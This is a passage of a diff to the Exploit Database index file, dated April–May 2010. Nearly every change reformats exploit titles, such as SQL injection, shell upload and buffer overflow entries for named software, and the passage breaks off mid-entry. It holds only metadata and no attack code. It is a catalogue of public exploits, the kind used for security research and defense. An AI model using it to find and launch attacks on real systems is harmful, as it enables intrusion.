12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 - Multiple SQL Injection",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 - .Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF",2010-04-02,"pratul agrawal",php,webapps,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorization header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0 -12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 +12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - (0Day) (2)",2010-04-02,"Richard leahy",windows,local,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 @@ -10990,12 +10990,12 @@ id,file,description,date,author,platform,type,port 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router - CSRF / Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs - SQL Injection",2010-04-03,Valentin,php,webapps,0 12038,platforms/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,php,webapps,0 -12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump",2010-04-04,indoushka,multiple,webapps,0 +12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 - Backup Dump",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0 12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0 -12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 +12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12049,platforms/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 @@ -11062,7 +11062,7 @@ id,file,description,date,author,platform,type,port 12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla - LFI / SQLi [cbuser]",2010-04-08,AntiSecurity,php,webapps,0 12114,platforms/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0 -12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 +12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit - Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0 12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 12120,platforms/php/webapps/12120.txt,"Joomla Component Foobla Suggestions com_foobla - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 @@ -11093,12 +11093,12 @@ id,file,description,date,author,platform,type,port 12149,platforms/php/webapps/12149.txt,"Joomla Component spsNewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla Component AlphaUserPoints - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12151,platforms/php/webapps/12151.txt,"Joomla Component TRAVELbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12152,platforms/windows/remote/12152.pl,"Trellian FTP Client PASV BoF Exploit",2010-04-11,zombiefx,windows,remote,0 +12152,platforms/windows/remote/12152.pl,"Trellian FTP Client - PASV BoF Exploit",2010-04-11,zombiefx,windows,remote,0 12153,platforms/php/webapps/12153.txt,"joomla component education - SQL Injection",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin 'Cyb - Advanced Forum Statistics' DoS",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - RCE",2010-04-11,"Amoo Arash",php,webapps,0 -12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 -12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software SQL Injection",2010-04-11,Valentin,php,webapps,0 +12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer - Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 +12157,platforms/php/webapps/12157.txt,"OnePC mySite Management Software - SQL Injection",2010-04-11,Valentin,php,webapps,0 12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL injection",2010-04-11,"Easy Laster",php,webapps,0 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager - SQL Injection",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 @@ -11137,7 +11137,7 @@ id,file,description,date,author,platform,type,port 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (RFI/LFI) Multiple File Include",2010-04-13,"cr4wl3r ",php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injection",2010-04-13,"Easy Laster",php,webapps,0 -12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download",2010-04-13,indoushka,asp,webapps,0 +12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik - DataBase Download",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script - (Galore) Backup Dump",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script - Data Base Download",2010-04-13,indoushka,asp,webapps,0 12200,platforms/php/webapps/12200.txt,"Joomla Component QPersonel - SQL Injection",2010-04-13,Valentin,php,webapps,0 @@ -11151,13 +11151,13 @@ id,file,description,date,author,platform,type,port 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum SEH Overwrite PoC",2010-04-13,s4squatch,windows,dos,0 12212,platforms/php/webapps/12212.txt,"Opentel Openmairie tel 1.02 - Local File Inclusion",2010-04-14,"cr4wl3r ",php,webapps,0 12213,platforms/windows/local/12213.c,"Micropoint Proactive Denfense Mp110013.sys 1.3.10123.0 - Local Privilege Escalation Exploit",2010-04-14,MJ0011,windows,local,0 -12217,platforms/multiple/dos/12217.py,"Remote Exploit Against the Aircrack-NG Tools svn r1675",2010-04-14,"Lukas Lueg",multiple,dos,0 -12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 Backup Dump",2010-04-14,indoushka,asp,webapps,0 +12217,platforms/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Exploit",2010-04-14,"Lukas Lueg",multiple,dos,0 +12218,platforms/asp/webapps/12218.txt,"School Management System Pro 6.0.0 - Backup Dump",2010-04-14,indoushka,asp,webapps,0 12219,platforms/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,php,webapps,0 12220,platforms/php/webapps/12220.txt,"Almnzm 2.1 - SQL Injection",2010-04-14,"NeX HaCkEr",php,webapps,0 12221,platforms/php/webapps/12221.rb,"Bild Flirt 1.0 - SQL Injection",2010-04-14,"Easy Laster",php,webapps,0 12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 - SQL Injection",2010-04-14,indoushka,php,webapps,0 -12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload",2010-04-14,indoushka,php,webapps,0 +12223,platforms/php/webapps/12223.txt,"Multi-Mirror - Remote Upload",2010-04-14,indoushka,php,webapps,0 12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload",2010-04-14,indoushka,php,webapps,0 12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload",2010-04-14,indoushka,php,webapps,0 12227,platforms/php/webapps/12227.txt,"YUI Images Script - Shell Upload",2010-04-14,Mr.P3rfekT,php,webapps,0 @@ -11223,12 +11223,12 @@ id,file,description,date,author,platform,type,port 12289,platforms/php/webapps/12289.txt,"Joomla Component Contact Us Draw Root Map com_drawroot - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12290,platforms/php/webapps/12290.txt,"Joomla Component Contact Us Google Map com_google - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 12291,platforms/php/webapps/12291.txt,"Joomla Component iF surfALERT com_if_surfalert - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0 -12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload",2010-04-19,Mr.MLL,php,webapps,0 +12292,platforms/php/webapps/12292.txt,"Flex File Manager - Shell Upload",2010-04-19,Mr.MLL,php,webapps,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (RFI/LFI) Multiple File Include",2010-04-19,"cr4wl3r ",php,webapps,0 -12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 +12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 - Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 @@ -11275,7 +11275,7 @@ id,file,description,date,author,platform,type,port 12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 - Remote Arbitrary File Upload Exploit",2010-04-23,eidelweiss,php,webapps,0 12351,platforms/php/webapps/12351.txt,"memorial Web site script - (id) SQL Injection",2010-04-23,v3n0m,php,webapps,0 12353,platforms/php/webapps/12353.txt,"EPay Enterprise 4.13 - (cid) SQL Injection",2010-04-23,v3n0m,php,webapps,0 -12354,platforms/php/webapps/12354.pl,"NKINFOWEB SQL Injection",2010-04-23,d4rk-h4ck3r,php,webapps,0 +12354,platforms/php/webapps/12354.pl,"NKINFOWEB - SQL Injection",2010-04-23,d4rk-h4ck3r,php,webapps,0 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password & Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 @@ -11300,8 +11300,8 @@ id,file,description,date,author,platform,type,port 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 - PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0 12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0Day)",2010-04-25,SeeMe,multiple,dos,0 -12383,platforms/php/webapps/12383.txt,"clipak Upload",2010-04-25,indoushka,php,webapps,0 -12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload",2010-04-25,Sec-q8,php,webapps,0 +12383,platforms/php/webapps/12383.txt,"clipak - Upload Exploit",2010-04-25,indoushka,php,webapps,0 +12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts - Shell Upload",2010-04-25,Sec-q8,php,webapps,0 12385,platforms/php/webapps/12385.html,"TR Forum 1.5 - Insert Admin CSRF",2010-04-25,EL-KAHINA,php,webapps,0 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump",2010-04-25,indoushka,php,webapps,0 12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps,0 @@ -11321,7 +11321,7 @@ id,file,description,date,author,platform,type,port 12410,platforms/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps,0 12411,platforms/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12412,platforms/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,php,webapps,0 -12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 +12413,platforms/php/webapps/12413.txt,"i-Net Online Community - XSS / Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12414,platforms/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,php,webapps,0 @@ -11341,7 +11341,7 @@ id,file,description,date,author,platform,type,port 12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component - Upload",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 -12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 +12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 12436,platforms/php/webapps/12436.txt,"Pligg CMS 1.0.4 - (story.php?id) SQL Injection",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 / 4.0.4 - Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 @@ -11351,7 +11351,7 @@ id,file,description,date,author,platform,type,port 12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook - (casting_view.php) SQL Injection",2010-04-28,v3n0m,php,webapps,0 -12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection",2010-04-28,v3n0m,php,webapps,0 +12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0 12445,platforms/php/webapps/12445.txt,"Articles Directory - Authenication Bypass",2010-04-29,Sid3^effects,php,webapps,0 12446,platforms/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps,0 12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup",2010-04-29,indoushka,php,webapps,0 @@ -11397,11 +11397,11 @@ id,file,description,date,author,platform,type,port 12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - XSS",2010-05-03,mega-itec.com,php,webapps,0 12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit (0Day)",2010-05-03,"Inj3ct0r Team",multiple,dos,0 14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL injection",2010-06-24,Sangteamtham,php,webapps,0 -12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 +12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0Day)",2010-05-03,R3d-D3V!L,windows,dos,0 12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Auth Exploit (ASLR + DEP bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 -12496,platforms/php/webapps/12496.html,"KubeBlog CSRF",2010-05-03,The.Morpheus,php,webapps,0 +12496,platforms/php/webapps/12496.html,"KubeBlog - CSRF",2010-05-03,The.Morpheus,php,webapps,0 12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X - (.tif) Local Buffer Overflow PoC (0Day)",2010-05-04,"fl0 fl0w",windows,local,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 12499,platforms/php/webapps/12499.txt,"dbhcms 1.1.4 - Stored XSS",2010-05-04,ITSecTeam,php,webapps,0 @@ -11420,7 +11420,7 @@ id,file,description,date,author,platform,type,port 12516,platforms/windows/local/12516.py,"BaoFeng Storm - .M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 - LFI",2010-05-06,Batch,php,webapps,0 12518,platforms/windows/dos/12518.pl,"Microsoft Paint - Integer Overflow (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0 -12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 +12519,platforms/php/webapps/12519.txt,"AV Arcade - Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0 12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - LFI",2010-05-06,"ALTBTA ",php,webapps,0 12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,php,webapps,0 @@ -11429,10 +11429,10 @@ id,file,description,date,author,platform,type,port 12525,platforms/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0 12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0 -12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 +12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 - (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 -12531,platforms/windows/dos/12531.pl,"GeoHttpServer Remote DoS",2010-05-08,aviho1,windows,dos,0 +12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote DoS",2010-05-08,aviho1,windows,dos,0 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - (offers.php) SQL Injection",2010-05-08,v3n0m,php,webapps,0 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 @@ -11440,7 +11440,7 @@ id,file,description,date,author,platform,type,port 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman - Upload",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Metasploit)",2010-05-08,blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 -12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 +12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12543,platforms/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12544,platforms/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 12545,platforms/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 @@ -11450,7 +11450,7 @@ id,file,description,date,author,platform,type,port 12551,platforms/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injection",2010-05-10,gendenk,php,webapps,0 12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - (makale.php id) SQL Injection",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - (login.php) Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 -12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS",2010-05-10,XroGuE,php,dos,0 +12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - DoS",2010-05-10,XroGuE,php,dos,0 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS",2010-05-10,"Pouya Daneshmand",multiple,dos,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 @@ -11459,7 +11459,7 @@ id,file,description,date,author,platform,type,port 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multi SQL Injection",2010-05-10,R3d-D3V!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil - Remote File Inclusion / Local File Inclusion",2010-05-10,eXeSoul,php,webapps,0 12563,platforms/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps,0 -12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail- Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 +12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) LFI",2010-05-11,CoBRa_21,php,webapps,0 12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,indoushka,php,webapps,0 @@ -11487,7 +11487,7 @@ id,file,description,date,author,platform,type,port 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi - (sid) SQL Injection",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 -12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox XSS",2010-05-13,"Valentin Hoebel",php,webapps,0 +12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - XSS",2010-05-13,"Valentin Hoebel",php,webapps,0 12594,platforms/php/webapps/12594.txt,"Joomla Component Seber Cart - (getPic.php) Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0 12595,platforms/php/webapps/12595.txt,"Joomla Component FDione Form Wizard - LFI",2010-05-13,"Chip d3 bi0s",php,webapps,0 12596,platforms/php/webapps/12596.txt,"Link Bid Script - (links.php id) SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0 @@ -11513,7 +11513,7 @@ id,file,description,date,author,platform,type,port 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload 0.9.5 - LFI",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0 -12620,platforms/php/webapps/12620.txt,"The iceberg 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 +12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) Stack Buffer Overflow PoC Exploit (0Day)",2010-05-16,sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 @@ -11523,7 +11523,7 @@ id,file,description,date,author,platform,type,port 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL/XSS/HTML Injection",2010-05-17,CoBRa_21,php,webapps,0 12632,platforms/php/webapps/12632.txt,"Joomla Component com_crowdsource - SQL Injection",2010-05-17,ByEge,php,webapps,0 12633,platforms/php/webapps/12633.txt,"Joomla Component com_event - Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 -12634,platforms/php/webapps/12634.txt,"PHP Gamepage SQL Injection",2010-05-17,v4lc0m87,php,webapps,0 +12634,platforms/php/webapps/12634.txt,"PHP Gamepage - SQL Injection",2010-05-17,v4lc0m87,php,webapps,0 12635,platforms/php/webapps/12635.txt,"PHP-Fusion 4.01 - SQL Injection",2010-05-17,Ma3sTr0-Dz,php,webapps,0 12636,platforms/php/webapps/12636.txt,"MidiCart PHP/ASP - Shell Upload",2010-05-17,DigitALL,php,webapps,0 12637,platforms/php/webapps/12637.txt,"MyNews 1.0 CMS - SQL Injection / Local File Inclusion / XSS",2010-05-17,mr_me,php,webapps,0 @@ -11543,19 +11543,19 @@ id,file,description,date,author,platform,type,port 12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 - Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection",2010-05-18,Pokeng,php,webapps,0 12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0 -12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload",2010-05-19,DigitALL,php,webapps,0 +12656,platforms/php/webapps/12656.txt,"Battle Scrypt - Shell Upload",2010-05-19,DigitALL,php,webapps,0 12657,platforms/windows/remote/12657.txt,"Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)",2010-05-19,"Jordi Chancel",windows,remote,0 12658,platforms/freebsd/webapps/12658.txt,"McAfee Email Gateway 